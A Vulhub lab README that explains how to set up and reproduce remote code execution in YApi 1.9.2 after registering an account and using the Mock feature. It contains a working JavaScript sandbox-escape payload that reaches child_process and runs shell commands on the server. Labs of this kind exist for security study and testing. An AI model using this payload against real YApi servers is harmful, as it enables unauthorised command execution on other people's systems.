Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
50 lines
1.2 KiB
Markdown
50 lines
1.2 KiB
Markdown
# YApi Registration and Mock Remote Code Execution
|
|
|
|
[中文版本(Chinese version)](README.zh-cn.md)
|
|
|
|
YApi is a API management tool developed by Node.JS. If registration of the YApi server is enabled, attackers will be able to execute arbitrary Javascript code in the Mock page.
|
|
|
|
References:
|
|
|
|
- <https://paper.seebug.org/1639/>
|
|
- <https://www.freebuf.com/vuls/279967.html>
|
|
|
|
## Vulnerability Environment
|
|
|
|
Execute following command to start a YApi server 1.9.2:
|
|
|
|
```
|
|
docker compose up -d
|
|
```
|
|
|
|
After the server is started, browse the `http://localhost:3000` to see the index page of the YApi.
|
|
|
|
## Vulnerability Reproduce
|
|
|
|
Register a normal user then create a project and an interface:
|
|
|
|
|
|
|
|
|
|
|
|
There is a "Mock Tab" that you can input JavaScript code, put the evil code into textarea:
|
|
|
|
```
|
|
const sandbox = this
|
|
const ObjectConstructor = this.constructor
|
|
const FunctionConstructor = ObjectConstructor.constructor
|
|
const myfun = FunctionConstructor('return process')
|
|
const process = myfun()
|
|
mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()
|
|
```
|
|
|
|
|
|
|
|
Then, go back to the preview tab and see the Mock URL:
|
|
|
|
|
|
|
|
Open that URL, Mock script is executed and you can see the output:
|
|
|
|
|